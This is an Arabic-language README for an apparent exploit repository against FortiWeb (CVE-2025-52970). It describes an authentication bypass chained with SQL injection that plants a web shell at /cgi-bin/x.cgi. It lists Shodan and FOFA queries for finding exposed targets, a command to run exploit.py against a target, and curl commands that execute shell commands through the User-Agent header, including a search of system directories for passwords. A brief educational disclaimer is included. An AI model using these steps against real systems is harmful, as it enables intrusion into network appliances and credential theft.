
يُظهر تجاوزًا للمصادقة في FortiWeb (CVE-2025-52970) مقترنًا بحقن SQL لتحميل شِل ويب وتحقيق تنفيذ الأوامر عن بُعد عبر رؤوس HTTP.
يوضح هذا المستودع تجاوز المصادقة في FortiWeb والذي يمكن ربطه لتحقيق تنفيذ الأوامر عن بُعد (RCE).
يستغل الثغرة نقطة نهاية ضعيفة لحقن حمولات SQL، تحميل ويب شيل، وتنفيذ الأوامر عبر رؤوس HTTP.
⚠️ إخلاء مسؤولية:
هذا المشروع لأغراض تعليمية وبحثية فقط.
لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
((FortiWeb)) AND port:("8443")
### FOFA
title="FortiWeb" && port="8443"
### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
CVE: CVE-2025-52970
المكون: FortiWeb Fabric API (/api/fabric/device/status)
التأثير: تجاوز المصادقة → حقن SQL → تحميل ويب شيل → RCE
الناقل: رأس Authorization مصمم + حقن SQL
حذف وإنشاء جدول SQL مؤقت.
كتابة حمولة الويب شيل في أجزاء.
تصدير الشيل إلى /cgi-bin/x.cgi.
تحميل نص Python مساعد لتشغيل الأذونات.
الوصول إلى الويب شيل بإرسال الأوامر عبر رأس User-Agent.
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/
3️⃣ التفاعل مع الويب شيل
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
